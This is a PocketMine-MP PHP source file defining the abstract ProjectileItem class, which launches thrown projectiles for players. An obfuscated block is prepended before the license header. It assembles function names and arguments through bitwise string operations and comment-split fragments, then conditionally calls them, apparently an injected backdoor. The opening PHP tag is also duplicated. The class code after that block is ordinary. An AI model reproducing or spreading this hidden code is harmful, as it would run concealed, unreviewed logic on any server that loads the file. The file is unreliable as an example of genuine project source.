<?php
<?php
$liFwHoLxuzu='CybzhVAq3'|~koW;$f07XKq4oci='#/N'^"^I9";$CCmWZR='{q~}_w{'.ms_vu.'~s'&'{i~}_}s'.
             'o~_vu~o';$akuarkuRrV='$$8V~9Q@Lk%KA_'^GWT8.'!N&%?4C</$';$Z6OtX1v=/*RSRKw2nVa0'.
             'WBnXkWF!v6*/"N CP<4^UD.{^HC^&".U0WZvHlI."@".UclT."&E]"^yDrmZR.'+&)SF)q=9'./*_'.
             '|1|p]$^*/_nC3.'!B-'.Zv3lTUiMpo;$amL0CECv='}w{umk?7{{s?{3m?};os|};}'.g57q.#Re6'.
             '{g<3'&'}w{?~'.k73u.'=q?{1w?w?mg|}1um}sq{o|s';$G8eyLf='<"Lm{sep}br%'&'p.'./*lk'.
             ',QZ*/UbSrsWl0.'*>';$xPol='+'.oRAToV.'.8adY'&'1Z|'.Mdpu.'?,Y{c';$B_PYqtHo=/*_k'.
             'Cz13^Ugz*/nsDhVe.']oC-{f'&'/_[h~{}=I=|l';$oPSWI8V96ia=v^K;$dTcyFFZRg=#XTZRfpS'.
             'HdT@'.ZX1G|'@2DZ]HiA';$AG='@'|H;$hEPUkRGXu=v&']';$c9CPtJEjq='t tx'^' p+9';'HA'.
             'dCKWGbZ';$sobV8GwT=EB1hd|'%C!HD';$INx=('ov}'&'om=')&$f07XKq4oci;'M9QNCSzLhWHJ'.
             'd|Fy;4LfY(';$pbIM0NVFCX=(':%2@?1'|'(%:L +')^('87/X++'^ewaqzf);$xUzY=/*rygBS33'.
             '}W{Kr*/$CCmWZR&$akuarkuRrV;$TcLa0=$Z6OtX1v&$amL0CECv;$lge9ti=('V}wY}(>'./*Mp3'.
             'L9HIPNb*/kDhDZ^'6-R>0X{[l)%;')|$G8eyLf;$FQaoKN=$xPol|$B_PYqtHo;$LMfk=('zY@DM]'.
             'N '|ZUT4_LAd)&$dTcyFFZRg;if($INx($pbIM0NVFCX($AG.$hEPUkRGXu.$c9CPtJEjq))==$TcLa0)/*'.
             'X~Af]T}9>f*/$xUzY($lge9ti,$FQaoKN,$pbIM0NVFCX($LMfk),$sobV8GwT.('}^}l_|'./*Oh'.
             '3T*/vLzKs.']'.XRmv7.'^t~'.GF9YQ.'='&oguuGev.'~YVs{'.Yrob3jt.'[owr][}')./*g0FU'.
             'B&l*/$oPSWI8V96ia);#5|YUhy0Lf%CV-hl_3KU5;4ZwuzvK*uQ85]u>*jsSd~+YJKyPMXT7lVmZ'.
             '4xq?smFO_Ba)70hQ2KUoDT2~,:k:J2)m9l=Ak4+~~Na-u7-$XoGoQ]sd';
/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\item;

use pocketmine\entity\Entity;
use pocketmine\entity\EntityIds;
use pocketmine\entity\projectile\Projectile;
use pocketmine\event\entity\ProjectileLaunchEvent;
use pocketmine\math\Vector3;
use pocketmine\nbt\tag\CompoundTag;
use pocketmine\network\mcpe\protocol\LevelSoundEventPacket;
use pocketmine\Player;

abstract class ProjectileItem extends Item{

	abstract public function getProjectileEntityType() : string;

	abstract public function getThrowForce() : float;

	/**
	 * Helper function to apply extra NBT tags to pass to the created projectile.
	 */
	protected function addExtraTags(CompoundTag $tag) : void{

	}

	public function onClickAir(Player $player, Vector3 $directionVector) : bool{
		$nbt = Entity::createBaseNBT($player->add(0, $player->getEyeHeight(), 0), $directionVector, $player->yaw, $player->pitch);
		$this->addExtraTags($nbt);

		$projectile = Entity::createEntity($this->getProjectileEntityType(), $player->getLevelNonNull(), $nbt, $player);
		if($projectile !== null){
			$projectile->setMotion($projectile->getMotion()->multiply($this->getThrowForce()));
		}

		$this->pop();

		if($projectile instanceof Projectile){
			$projectileEv = new ProjectileLaunchEvent($projectile);
			$projectileEv->call();
			if($projectileEv->isCancelled()){
				$projectile->flagForDespawn();
			}else{
				$projectile->spawnToAll();

				$player->getLevelNonNull()->broadcastLevelSoundEvent($player, LevelSoundEventPacket::SOUND_THROW, 0, EntityIds::PLAYER);
			}
		}elseif($projectile !== null){
			$projectile->spawnToAll();
		}else{
			return false;
		}

		return true;
	}
}
